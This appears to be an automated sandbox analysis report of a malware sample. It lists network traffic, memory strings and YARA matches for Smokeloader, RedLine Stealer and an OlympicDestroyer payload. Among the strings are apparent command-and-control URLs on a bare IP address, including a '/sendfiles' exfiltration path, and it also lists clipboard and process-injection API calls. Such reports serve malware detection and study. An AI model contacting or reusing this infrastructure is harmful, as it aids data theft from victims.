      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:11:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:11:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:11:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:12:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:12:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:12:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:12:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:14:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:14:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: Later.pif, Later.pif, 00000013.00000002.4560271483.0000000001668000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://46.246.96.149/
      Source: Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://46.246.96.149/e_usertestGoogle
      Source: Later.pif, 00000013.00000003.4155490022.0000000001690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.246.96.149/sendfiles
      Source: Later.pif, 00000013.00000002.4560271483.0000000001668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.246.96.149/x
      Source: 9CFE.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2165593335.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: 9CFE.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: 9CFE.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: 9CFE.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.drString found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
      Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
      Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.drString found in binary or memory: http://crl.globalsign.net/root.crl0
      Source: explorer.exe, 00000002.00000000.2159497737.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
      Source: 9CFE.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2165593335.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: 9CFE.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: 9CFE.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: 9CFE.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2165593335.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: 9CFE.exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: 9CFE.exe, 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmp, 9CFE.exe, 00000007.00000000.2816744193.0000000000408000.00000002.00000001.01000000.00000006.sdmp, 9CFE.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2165593335.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, 9CFE.exe.2.drString found in binary or memory: http://ocsp.digicert.com0
      Source: 9CFE.exe.2.drString found in binary or memory: http://ocsp.digicert.com0A
      Source: 9CFE.exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
      Source: 9CFE.exe.2.drString found in binary or memory: http://ocsp.digicert.com0X
      Source: explorer.exe, 00000002.00000000.2165593335.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
      Source: explorer.exe, 00000002.00000000.2165022415.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2165059057.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2164441432.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
      Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
      Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.drString found in binary or memory: http://www.autoitscript.com/autoit3/0
      Source: explorer.exe, 00000002.00000000.2171644821.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2171644821.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, 9CFE.exe, 00000007.00000003.2819759144.0000000002843000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000011.00000000.2887878869.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp, Later.pif, 00000013.00000000.3863074525.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp, Later.pif.8.dr, Services.7.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: 9CFE.exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
      Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: explorer.exe, 00000002.00000000.2169172089.000000000C549000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000002.00000000.2163432174.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000002.00000000.2163432174.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000002.00000000.2162269436.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
      Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
      Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
      Source: explorer.exe, 00000002.00000000.2169172089.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000002.00000000.2165593335.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
      Source: explorer.exe, 00000002.00000000.2165593335.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
      Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drString found in binary or memory: https://www.ecosia.org/newtab/
      Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.drString found in binary or memory: https://www.globalsign.com/repository/03
      Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownHTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.5:49727 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_004050CD
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C64614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,19_2_00C64614
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C64416 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,19_2_00C64416
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,7_2_004044A5
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C7CEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,19_2_00C7CEDF

      System Summary

      barindex
      Source: 19.2.Later.pif.1400000.1.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
      Source: 19.2.Later.pif.1400000.1.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
      Source: 00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000004.00000002.2417051568.000000000214B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: OlympicDestroyer Payload Author: kevoreilly
      Source: 00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000004.00000002.2417110423.0000000002240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.2183129368.000000000229B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401538 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401538
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402FE9 RtlCreateUserThread,NtTerminateProcess,0_2_00402FE9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014DE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014DE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401496 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401496
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401543
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401565 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401565
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401579 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401579
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040157C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040157C
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C540C1: CreateFileW,DeviceIoControl,CloseHandle,19_2_00C540C1
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C48D11 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,19_2_00C48D11
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,7_2_00403883
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C555E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,19_2_00C555E5
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_0040497C7_2_0040497C
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_00406ED27_2_00406ED2
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_004074BB7_2_004074BB
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C781C819_2_00C781C8
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C1232519_2_00C12325
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C2643219_2_00C26432
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C2258E19_2_00C2258E
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BFE6F019_2_00BFE6F0
